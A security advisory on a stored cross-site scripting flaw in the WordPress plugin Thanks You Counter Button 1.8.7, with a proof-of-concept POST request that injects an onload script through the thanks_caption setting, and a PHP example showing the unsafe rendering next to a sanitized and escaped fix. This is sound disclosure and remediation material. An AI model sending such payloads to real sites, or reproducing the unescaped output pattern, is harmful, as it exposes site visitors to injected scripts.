WordPress Thanks You Counter Button 1.8.7 Cross Site Scripting

2014.02.26
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ==============================================================
# Title ...| Thanks You Counter Button XSS
# Version .| thanks-you-counter-button 1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================

# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 806

option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes
---<request>---

[+] Also vulnerable are: thanks_caption_style, thanks_style

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
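The advisory reports the classic stored-XSS pattern: a plugin settings value saved through options.php is later written into page markup unescaped. The following is an added illustration written for this page, not the plugin's actual source; the option names (thanks_caption, thanks_caption_style, thanks_style) and the option group thankyoubutton-options come from the request above, while the tyb_* function names are hypothetical. It shows the unsafe rendering next to the two fixes a WordPress plugin would apply: sanitize on save via register_setting() and escape on output.

```php
<?php
// Added illustration of the CWE-79 pattern in this advisory, not the plugin's code.
// Option names are taken from the advisory's request; tyb_* names are hypothetical.

// --- Vulnerable pattern: the stored setting is inserted into HTML as-is. ----------
function tyb_render_caption_unsafe() {
    $caption = get_option( 'thanks_caption', '' );
    $style   = get_option( 'thanks_caption_style', '' );
    // A caption containing quotes and angle brackets closes the attribute and the
    // tag, so whatever an admin-form submission stored runs in every visitor's browser.
    echo '<span style="' . $style . '">' . $caption . '</span>';
}

// --- Hardened pattern -------------------------------------------------------------
// 1. Sanitize on save: register each option with a sanitize callback so that
//    options.php only ever stores clean values, however the form was submitted.
function tyb_register_settings() {
    register_setting( 'thankyoubutton-options', 'thanks_caption',
        array( 'sanitize_callback' => 'sanitize_text_field' ) );
    register_setting( 'thankyoubutton-options', 'thanks_caption_style',
        array( 'sanitize_callback' => 'tyb_sanitize_inline_style' ) );
    register_setting( 'thankyoubutton-options', 'thanks_style',
        array( 'sanitize_callback' => 'tyb_sanitize_inline_style' ) );
}
add_action( 'admin_init', 'tyb_register_settings' );

// Accept only a conservative "property: value;" character set for inline CSS;
// anything else (quotes, angle brackets, parentheses) resets the option to empty.
function tyb_sanitize_inline_style( $value ) {
    $value = sanitize_text_field( $value );
    return preg_match( '/^[a-zA-Z0-9\s:;,%#.\-]*$/', $value ) ? $value : '';
}

// 2. Escape on output with context-appropriate functions, so even a value that
//    was stored before the fix cannot break out of its attribute or text node.
function tyb_render_caption_safe() {
    $caption = get_option( 'thanks_caption', '' );
    $style   = get_option( 'thanks_caption_style', '' );
    printf( '<span style="%s">%s</span>', esc_attr( $style ), esc_html( $caption ) );
}
```

Both layers matter: sanitizing on save stops new bad values, while escaping on output also neutralises values already sitting in wp_options from before the fix.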


Copyright 2024, cxsecurity.com